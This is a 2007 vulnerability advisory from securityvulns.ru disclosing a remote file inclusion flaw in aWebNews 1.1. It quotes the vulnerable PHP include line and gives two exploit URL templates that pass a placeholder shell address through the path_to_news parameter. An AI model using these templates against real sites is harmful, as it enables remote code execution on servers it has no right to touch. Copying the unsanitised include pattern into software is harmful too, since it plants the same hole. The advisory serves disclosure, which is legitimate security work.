Computer Security

Security Advisory: aWebNews v 1.1=>RFI
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  SPAW Editor PHP Edition

  vBulletin v3.6.5 admincp/index.php ( rss feed ) xss vuln.

  Mani Admin Plugin Stats Reader V1.2 rfi :)

  WB News Remote File Include in all versions

From:ThE dE@Th <mostafa_ragab_(at)_msn.com>
Date:02.03.2007
Subject:aWebNews v 1.1=>RFI

*******************************************************************************
>>To ConTacT mE @ www.Asb-May.net/bb
>>ScRiPt:-http://scripts.ringsworld.com/news-publishing/awebnews.zip
>>GrEaTz To:-ToOofa-HaCk.eGy (All AsB-MaY DisCoverY ExPloIts GrOup)
>>Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP} >>
******************************************************************************
>>comment.php:-
>>
>>sendmsg:-
>>include
>>$config['installdir']."/templates/".
$them['THEME_DIRECTORY']."/admin/theme_info.php";
*******************************************************************************
>>ExPlOiT:-http://www.SitE.*/[aWebNewsPaTh]/listing.
php?path_to_news=[Shell]
>>ExPlOiT:-http://www.SitE.*/[aWebNewsPaTh]/visview.
php?path_to_news=Shell]
*******************************************************************************

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server